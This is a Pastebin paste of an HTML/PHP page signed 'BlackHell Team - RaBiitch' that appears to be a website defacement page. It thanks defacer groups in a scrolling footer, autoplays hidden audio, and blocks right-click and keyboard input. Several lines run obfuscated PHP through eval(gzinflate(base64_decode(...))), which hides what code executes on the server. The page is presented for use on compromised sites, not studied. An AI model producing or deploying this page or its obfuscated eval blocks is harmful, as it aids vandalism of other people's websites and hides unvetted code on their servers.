Advertisement
RaBiitch

RaBiitch V2

Jul 17th, 2018
392
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 13.40 KB | None | 0 0
  1. <html>
  2.     <head>
  3.         <title>BlackHell Team - RaBiitch</title>
  4. <meta name='description' content='We are playing your Sistem' />
  5. <meta name='keywords' content='RaBiitch Official' />
  6. <meta name='author' content='RaBiitch' />
  7. <meta name='rating' content='general' />
  8. <meta name='geo.country' content='id' />
  9. <meta name='geo.placename' content='Indonesia' />
  10. <meta name='robots' content='all'/>
  11. <meta name='robots' content='index, follow' />
  12. <meta name='robots schedule' content='auto'/>
  13. <meta name='revisit-after' content='1 days' />
  14. <meta name='googlebot' content='index,follow'/>
  15. <meta name='distribution' content='global'/>
  16. <meta contact='http://facebook.com/rabiitch'/>
  17. <link href='https://2.bp.blogspot.com/--rLYu7yG8J0/WypDMNWhVLI/AAAAAAAACaE/cLkvz5mcQKQfWh37sUkVY5NqMR05zCbugCLcBGAs/s1600/indonesia-flag-image-0020.png' rel='icon' type='image/x-icon'>
  18.         <link href="http://fonts.googleapis.com/css?family=Orbitron"
  19. rel="stylesheet" type="text/css" /><script>
  20.             alert("Loading...");
  21.             alert("Just Joke :v");
  22.             jQuery(document).ready(function(){
  23.                 $('h1').mousemove(function(e){
  24.                     var rXP = (e.pageX - this.offsetLeft-$(this).width()/2);
  25.                     var rYP = (e.pageY - this.offsetTop-$(this).height()/2);
  26.                     $('h1').css('text-shadow', +rYP/10+'px '+rXP/80+'px rgba(227,6,19,.8), '+rYP/8+'px '+rXP/60+'px rgba(255,237,0,1), '+rXP/70+'px '+rYP/12+'px rgba(0,159,227,.7)');
  27.                 });
  28.             });
  29.             function typeEffect(element, speed) {
  30.                 var text = $(element).text();
  31.                 $(element).html('');
  32.                 var i = 0;
  33.                 var timer = setInterval(function() {
  34.                     if (i < text.length) {
  35.                         $(element).append(text.charAt(i));
  36.                         i++;
  37.                     } else {
  38.                         clearInterval(timer);
  39.                     }
  40.                 }, speed);
  41.             }
  42.             $( document ).ready(function() {
  43.                 var speed = 75;
  44.                 var delay = $('h1').text().length * speed + speed;
  45.                 typeEffect($('h1'), speed);
  46.                 setTimeout(function(){
  47.                     $('h4').css('display', 'inline-block');
  48.                     typeEffect($('h4'), speed);
  49.             }, delay);
  50.             });
  51.         </script><style type="text/css">
  52. #footer {
  53.   align: center;
  54.   position: fixed;
  55.   background-color: black;
  56.   width: 100%;
  57.   height:16px;
  58.   text-align: left;
  59.   color: white;
  60.   font-family: Courier;
  61.   font-size: 11px;
  62.   z-index:10000;
  63.   bottom:0;
  64. }
  65. #container {
  66.   width:97vw;
  67.   margin:2vw auto;
  68. }
  69. font{
  70.   font-familly:Orbitron;
  71.   text-align:center;
  72.   letter-spacing:1px;
  73.   color:white;
  74.   /*Create overlap*/
  75.  
  76.   margin:0;
  77.   line-height:0;
  78.   /*Animation*/
  79.  
  80.   -webkit-animation: glitch1 2.5s infinite;
  81.  
  82.           animation: glitch1 2.5s infinite;
  83. }
  84.  
  85. font:nth-child(2) {
  86.   color: #67f3da;
  87.   -webkit-animation: glitch2 2.5s infinite;
  88.           animation: glitch2 2.5s infinite;
  89. }
  90.  
  91. font:nth-child(3) {
  92.   color: #f16f6f;
  93.   -webkit-animation: glitch3 2.5s infinite;
  94.           animation: glitch3 2.5s infinite;
  95. }
  96. /*Keyframes*/
  97.  
  98. @-webkit-keyframes glitch1 {
  99.   0% {
  100.     -webkit-transform: none;
  101.             transform: none;
  102.     opacity: 1;
  103.   }
  104.   7% {
  105.     -webkit-transform: skew(-0.5deg, -0.9deg);
  106.             transform: skew(-0.5deg, -0.9deg);
  107.     opacity: 0.75;
  108.   }
  109.   10% {
  110.     -webkit-transform: none;
  111.             transform: none;
  112.     opacity: 1;
  113.   }
  114.   27% {
  115.     -webkit-transform: none;
  116.             transform: none;
  117.     opacity: 1;
  118.   }
  119.   30% {
  120.     -webkit-transform: skew(0.8deg, -0.1deg);
  121.             transform: skew(0.8deg, -0.1deg);
  122.     opacity: 0.75;
  123.   }
  124.   35% {
  125.     -webkit-transform: none;
  126.             transform: none;
  127.     opacity: 1;
  128.   }
  129.   52% {
  130.     -webkit-transform: none;
  131.             transform: none;
  132.     opacity: 1;
  133.   }
  134.   55% {
  135.     -webkit-transform: skew(-1deg, 0.2deg);
  136.             transform: skew(-1deg, 0.2deg);
  137.     opacity: 0.75;
  138.   }
  139.   50% {
  140.     -webkit-transform: none;
  141.             transform: none;
  142.     opacity: 1;
  143.   }
  144.   72% {
  145.     -webkit-transform: none;
  146.             transform: none;
  147.     opacity: 1;
  148.   }
  149.   75% {
  150.     -webkit-transform: skew(0.4deg, 1deg);
  151.             transform: skew(0.4deg, 1deg);
  152.     opacity: 0.75;
  153.   }
  154.   80% {
  155.     -webkit-transform: none;
  156.             transform: none;
  157.     opacity: 1;
  158.   }
  159.   100% {
  160.     -webkit-transform: none;
  161.             transform: none;
  162.     opacity: 1;
  163.   }
  164. }
  165.  
  166. @keyframes glitch1 {
  167.   0% {
  168.     -webkit-transform: none;
  169.             transform: none;
  170.     opacity: 1;
  171.   }
  172.   7% {
  173.     -webkit-transform: skew(-0.5deg, -0.9deg);
  174.             transform: skew(-0.5deg, -0.9deg);
  175.     opacity: 0.75;
  176.   }
  177.   10% {
  178.     -webkit-transform: none;
  179.             transform: none;
  180.     opacity: 1;
  181.   }
  182.   27% {
  183.     -webkit-transform: none;
  184.             transform: none;
  185.     opacity: 1;
  186.   }
  187.   30% {
  188.     -webkit-transform: skew(0.8deg, -0.1deg);
  189.             transform: skew(0.8deg, -0.1deg);
  190.     opacity: 0.75;
  191.   }
  192.   35% {
  193.     -webkit-transform: none;
  194.             transform: none;
  195.     opacity: 1;
  196.   }
  197.   52% {
  198.     -webkit-transform: none;
  199.             transform: none;
  200.     opacity: 1;
  201.   }
  202.   55% {
  203.     -webkit-transform: skew(-1deg, 0.2deg);
  204.             transform: skew(-1deg, 0.2deg);
  205.     opacity: 0.75;
  206.   }
  207.   50% {
  208.     -webkit-transform: none;
  209.             transform: none;
  210.     opacity: 1;
  211.   }
  212.   72% {
  213.     -webkit-transform: none;
  214.             transform: none;
  215.     opacity: 1;
  216.   }
  217.   75% {
  218.     -webkit-transform: skew(0.4deg, 1deg);
  219.             transform: skew(0.4deg, 1deg);
  220.     opacity: 0.75;
  221.   }
  222.   80% {
  223.     -webkit-transform: none;
  224.             transform: none;
  225.     opacity: 1;
  226.   }
  227.   100% {
  228.     -webkit-transform: none;
  229.             transform: none;
  230.     opacity: 1;
  231.   }
  232. }
  233.  
  234. @-webkit-keyframes glitch2 {
  235.   0% {
  236.     -webkit-transform: none;
  237.             transform: none;
  238.     opacity: 0.25;
  239.   }
  240.   7% {
  241.     -webkit-transform: translate(-2px, -3px);
  242.             transform: translate(-2px, -3px);
  243.     opacity: 0.5;
  244.   }
  245.   10% {
  246.     -webkit-transform: none;
  247.             transform: none;
  248.     opacity: 0.25;
  249.   }
  250.   27% {
  251.     -webkit-transform: none;
  252.             transform: none;
  253.     opacity: 0.25;
  254.   }
  255.   30% {
  256.     -webkit-transform: translate(-5px, -2px);
  257.             transform: translate(-5px, -2px);
  258.     opacity: 0.5;
  259.   }
  260.   35% {
  261.     -webkit-transform: none;
  262.             transform: none;
  263.     opacity: 0.25;
  264.   }
  265.   52% {
  266.     -webkit-transform: none;
  267.             transform: none;
  268.     opacity: 0.25;
  269.   }
  270.   55% {
  271.     -webkit-transform: translate(-5px, -1px);
  272.             transform: translate(-5px, -1px);
  273.     opacity: 0.5;
  274.   }
  275.   50% {
  276.     -webkit-transform: none;
  277.             transform: none;
  278.     opacity: 0.25;
  279.   }
  280.   72% {
  281.     -webkit-transform: none;
  282.             transform: none;
  283.     opacity: 0.25;
  284.   }
  285.   75% {
  286.     -webkit-transform: translate(-2px, -6px);
  287.             transform: translate(-2px, -6px);
  288.     opacity: 0.5;
  289.   }
  290.   80% {
  291.     -webkit-transform: none;
  292.             transform: none;
  293.     opacity: 0.25;
  294.   }
  295.   100% {
  296.     -webkit-transform: none;
  297.             transform: none;
  298.     opacity: 0.25;
  299.   }
  300. }
  301.  
  302. @keyframes glitch2 {
  303.   0% {
  304.     -webkit-transform: none;
  305.             transform: none;
  306.     opacity: 0.25;
  307.   }
  308.   7% {
  309.     -webkit-transform: translate(-2px, -3px);
  310.             transform: translate(-2px, -3px);
  311.     opacity: 0.5;
  312.   }
  313.   10% {
  314.     -webkit-transform: none;
  315.             transform: none;
  316.     opacity: 0.25;
  317.   }
  318.   27% {
  319.     -webkit-transform: none;
  320.             transform: none;
  321.     opacity: 0.25;
  322.   }
  323.   30% {
  324.     -webkit-transform: translate(-5px, -2px);
  325.             transform: translate(-5px, -2px);
  326.     opacity: 0.5;
  327.   }
  328.   35% {
  329.     -webkit-transform: none;
  330.             transform: none;
  331.     opacity: 0.25;
  332.   }
  333.   52% {
  334.     -webkit-transform: none;
  335.             transform: none;
  336.     opacity: 0.25;
  337.   }
  338.   55% {
  339.     -webkit-transform: translate(-5px, -1px);
  340.             transform: translate(-5px, -1px);
  341.     opacity: 0.5;
  342.   }
  343.   50% {
  344.     -webkit-transform: none;
  345.             transform: none;
  346.     opacity: 0.25;
  347.   }
  348.   72% {
  349.     -webkit-transform: none;
  350.             transform: none;
  351.     opacity: 0.25;
  352.   }
  353.   75% {
  354.     -webkit-transform: translate(-2px, -6px);
  355.             transform: translate(-2px, -6px);
  356.     opacity: 0.5;
  357.   }
  358.   80% {
  359.     -webkit-transform: none;
  360.             transform: none;
  361.     opacity: 0.25;
  362.   }
  363.   100% {
  364.     -webkit-transform: none;
  365.             transform: none;
  366.     opacity: 0.25;
  367.   }
  368. }
  369. mm
  370. @-webkit-keyframes glitch3 {
  371.   0% {
  372.     -webkit-transform: none;
  373.             transform: none;
  374.     opacity: 0.25;
  375.   }
  376.   7% {
  377.     -webkit-transform: translate(2px, 3px);
  378.             transform: translate(2px, 3px);
  379.     opacity: 0.5;
  380.   }
  381.   10% {
  382.     -webkit-transform: none;
  383.             transform: none;
  384.     opacity: 0.25;
  385.   }
  386.   27% {
  387.     -webkit-transform: none;
  388.             transform: none;
  389.     opacity: 0.25;
  390.   }
  391.   30% {
  392.     -webkit-transform: translate(5px, 2px);
  393.             transform: translate(5px, 2px);
  394.     opacity: 0.5;
  395.   }
  396.   35% {
  397.     -webkit-transform: none;
  398.             transform: none;
  399.     opacity: 0.25;
  400.   }
  401.   52% {
  402.     -webkit-transform: none;
  403.             transform: none;
  404.     opacity: 0.25;
  405.   }
  406.   55% {
  407.     -webkit-transform: translate(5px, 1px);
  408.             transform: translate(5px, 1px);
  409.     opacity: 0.5;
  410.   }
  411.   50% {
  412.     -webkit-transform: none;
  413.             transform: none;
  414.     opacity: 0.25;
  415.   }
  416.   72% {
  417.     -webkit-transform: none;
  418.             transform: none;
  419.     opacity: 0.25;
  420.   }
  421.   75% {
  422.     -webkit-transform: translate(2px, 6px);
  423.             transform: translate(2px, 6px);
  424.     opacity: 0.5;
  425.   }
  426.   80% {
  427.     -webkit-transform: none;
  428.             transform: none;
  429.     opacity: 0.25;
  430.   }
  431.   100% {
  432.     -webkit-transform: none;
  433.             transform: none;
  434.     opacity: 0.25;
  435.   }
  436. }
  437.  
  438. @keyframes glitch3 {
  439.   0% {
  440.     -webkit-transform: none;
  441.             transform: none;
  442.     opacity: 0.25;
  443.   }
  444.   7% {
  445.     -webkit-transform: translate(2px, 3px);
  446.             transform: translate(2px, 3px);
  447.     opacity: 0.5;
  448.   }
  449.   10% {
  450.     -webkit-transform: none;
  451.             transform: none;
  452.     opacity: 0.25;
  453.   }
  454.   27% {
  455.     -webkit-transform: none;
  456.             transform: none;
  457.     opacity: 0.25;
  458.   }
  459.   30% {
  460.     -webkit-transform: translate(5px, 2px);
  461.             transform: translate(5px, 2px);
  462.     opacity: 0.5;
  463.   }
  464.   35% {
  465.     -webkit-transform: none;
  466.             transform: none;
  467.     opacity: 0.25;
  468.   }
  469.   52% {
  470.     -webkit-transform: none;
  471.             transform: none;
  472.     opacity: 0.25;
  473.   }
  474.   55% {
  475.     -webkit-transform: translate(5px, 1px);
  476.             transform: translate(5px, 1px);
  477.     opacity: 0.5;
  478.   }
  479.   50% {
  480.     -webkit-transform: none;
  481.             transform: none;
  482.     opacity: 0.25;
  483.   }
  484.   72% {
  485.     -webkit-transform: none;
  486.             transform: none;
  487.     opacity: 0.25;
  488.   }
  489.   75% {
  490.     -webkit-transform: translate(2px, 6px);
  491.             transform: translate(2px, 6px);
  492.     opacity: 0.5;
  493.   }
  494.   80% {
  495.     -webkit-transform: none;transform: none;opacity: 0.25;}100%
  496. {
  497.     -webkit-transform: none;transform:
  498.          none;opacity: 0.25;
  499.   }
  500.  }
  501.       </style>
  502.    </head>
  503. <?php eval(gzinflate(base64_decode('c0jOL6jUcFCJd/P0cQ2OVq9Qj41WL8ktiM9LzE1Vj9VBk4GIaloDAA=='))); ?>
  504.            <body bgcolor="black" oncontextmenu="return false;"
  505. onkeydown="return false;" onmousedown="return false;"
  506. ondragstart="return false" onselectstart="return
  507. false">
  508.         <iframe width="0" height="0" src="https://www.youtube.com/embed/vr3i7IvghDw?autoplay=1" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>
  509.                  <center>
  510.                <br />
  511.              <br />
  512.            <br />
  513.          <br />
  514.        <br />
  515. <div id="container"><img src="https://minervagunceleri.files.wordpress.com/2014/08/logo.png"
  516. title="RaBiitch" />
  517.            <br />
  518.          <br />
  519.      <font face="Orbitron" size="7">BlackHell Team
  520. - <a href="https://www.rabiitch.me/" style="text-decoration:none"><font color="white">RaBiitch</font></a></font>
  521. <div id='footer'>
  522.     <marquee onmouseout='this.start()' onmouseover='this.stop()' scrollamount='5'>
  523. [!] Say Hello : A999T - NIGHTMARE - F0xBase - Mr.Adewa - Mr.CeRoS404 - RESIS-07 - M4M3N- M3sicth - MR.R29 - androgh0st - PenggilaCroot07 - Kyu_Kazami - HumanTersakiti404 - SCYTHE404_LOL - Mr. XID4pp - Mr.B4YK - ./0px - Mr.ΒΆENNYW|$E - ./NightBot_404 - /395 - MR.S04X - GuardiaN_ -  ./InisialF - N1ght_pe0ple420 - K4KTU5_id [!]  [!] Special Thanks : Indonesia Defacer Tersakiti Team - BlackHell Team - EZ Team - ExploiterXeroTeam - GopressXploits - <a href="https://www.rabiitch.me/" style="text-decoration:none"><font color="white">RaBiitch Official</font></a> <font color="red">[!]
  524. </marquee>
  525.  </div>
  526. <?php eval(gzinflate(base64_decode('LY3LCoMwEEX3hf7DEAJGKga6aEHppvgfMg2TGohJMCP5/fro6sLhcK4MOOMLbEwUlMCV471NUxLQiHITdX+9AEjrPMEmbTN+iUcTA1PgrKqJOeVO64SZ6eNCa+KsFyz6bfExPK2p/glevct7oyyOCZTcf6E50odijY+ZTl73Pw=='))); ?>
  527.    <?php eval(gzinflate(base64_decode('LY1BCoMwEEX3hd5hCAEjFbNtK256hG66lBgmNTROghnJ9au2qw+Px/uSzGx6cDEhKWFWjm2akoBGlIuou/MJQDofEDZnm+GNPNhIjMRZVRNzynetk8mMo6fWxlkvpujn63MbH/5a/RO8Bp/3Rlk8Iyi530JzpA/F2RAz/njdfQE='))); ?>
  528.              <br />
  529.            <br />
  530.          <br />
  531.       <?php eval(gzinflate(base64_decode('jY9La8JAEMfvgXyHYRE2lvgolFISBG1NwYN9xNiLyLJNVnfbbBJ2J6Df3k2lYm89Dczv/5iZqkoxKzCgdYtNi+yz3e2EUdWehjDuxzC9CAplm5IfmTCmNvaMfc8hhkoLViqtMOgsF4cWujbHM3F6en+3pI5LwQthAvpUVygqHGTHRkS+h+KAI4m6jCGX3LiEyTp7Hjx0lh62Xy2vNFclTIB+i7xFza2St+PpvtsO81pTpzuwhqP0vQkQidhEoxGBIfTYKkk/knRDz5O9zJYJ3f4hafK+TlYZW6cLunWP9RphecV4KQy6TrJTh994iBq4WbzBrCiMsBYi2ICrcZ6rtOVrlrDZfJ7+9BDYkhi6S4OrX0LfIyl/VApzSUK4rgyB/Cu0H58A'))); ?>
  532.          <font face="Orbitron" size="5">This Pain Is
  533. Wonderful</font>
  534.             </div>
  535.     </body>
  536. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement